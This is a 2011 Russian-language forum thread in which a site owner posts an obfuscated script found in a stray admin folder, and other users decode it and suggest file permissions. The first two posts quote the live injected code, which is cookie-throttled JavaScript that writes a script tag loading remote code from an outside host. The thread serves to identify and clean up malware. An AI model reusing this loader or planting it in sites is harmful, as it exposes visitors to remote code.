hrompic 4 Опубликовано: 11 июля 2011 Рассказать Опубликовано: 11 июля 2011 (изменено) Сегодня при проверке Антивирусом в админке была обнаружена левая папка JS со скриптом jquery-simple.js .Выкладываю здесь код-гляньте что за зверь: "; expires="+ expires.toGMTString()))+ ((path==null)?"""; path="+path))+ ((domain==null)?"""; domain="+domain))+ ((secure==true)?"; secure":"")} gomega();clicko=0; function gomega() { clicko=clicko+1; if(clicko<2) { Traf1788Ru=GoMegaBR('rgood_2'); if(Traf1788Ru<=2) { nexting=Number(Traf1788Ru)+1; lolypop(nexting)} } } function lolypop(gocode) { day=new Date(); id=day.getTime(); document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>'); pathname="/"; myDomain="/"; var largeExpDate=new Date(); largeExpDate.setTime(largeExpDate.getTime()+(4*60*60*1000)); Setkyks('rgood_2',gocode,largeExpDate,"/")} function GoMegaBRVal(offset){ var endstr=document.cookie.indexOf(";",offset); if(endstr==-1) endstr=document.cookie.length; return unescape(document.cookie.substring(offset,endstr))} function GoMegaBR(name){ var arg=name+"="; var alen=arg.length; var clen=document.cookie.length; var i=0; while(i<clen){ var j=i+alen; if(document.cookie.substring(i,j)==arg) return GoMegaBRVal(j); i=document.cookie.indexOf(" ",i)+1; if(i==0) break} return null} function Setkyks(name,value){ var argv=Setkyks.arguments; var argc=Setkyks.arguments.length; var expires=(argc>2)?argv[2]:null; var path=(argc>3)?argv[3]:null; var domain=(argc>4)?argv[4]:null; var secure=(argc>5)?argv[5]:false; document.cookie=name+"="+escape(value)+ ((expires==null)?"" Изменено 11 июля 2011 пользователем hrompic Цитата Ссылка на сообщение Поделиться на других сайтах
notbugme 0 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+' s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>'); цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script> Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 (изменено) Автор document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+' s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>'); цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script> Спасибо большое! А кроме этой папки для данного скрипта ничего не может быть еще на хостинге? Или этой папки достаточно чтобы скрипт выводился? И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов? Изменено 12 июля 2011 пользователем hrompic Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов? Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона. Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 Автор И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов? Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона. Какие права нужно выставить7 Спасибо! Цитата Ссылка на сообщение Поделиться на других сайтах
Dj Dance 185 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 Какие права нужно выставить7 adfrw (0664) Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 Автор Какие права нужно выставить7 adfrw (0664) А на папку? Цитата Ссылка на сообщение Поделиться на других сайтах
Dj Dance 185 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 А на папку? Аналогично. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 12 июля 2011 Рассказать Опубликовано: 12 июля 2011 На папки 755, на файлы 644 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.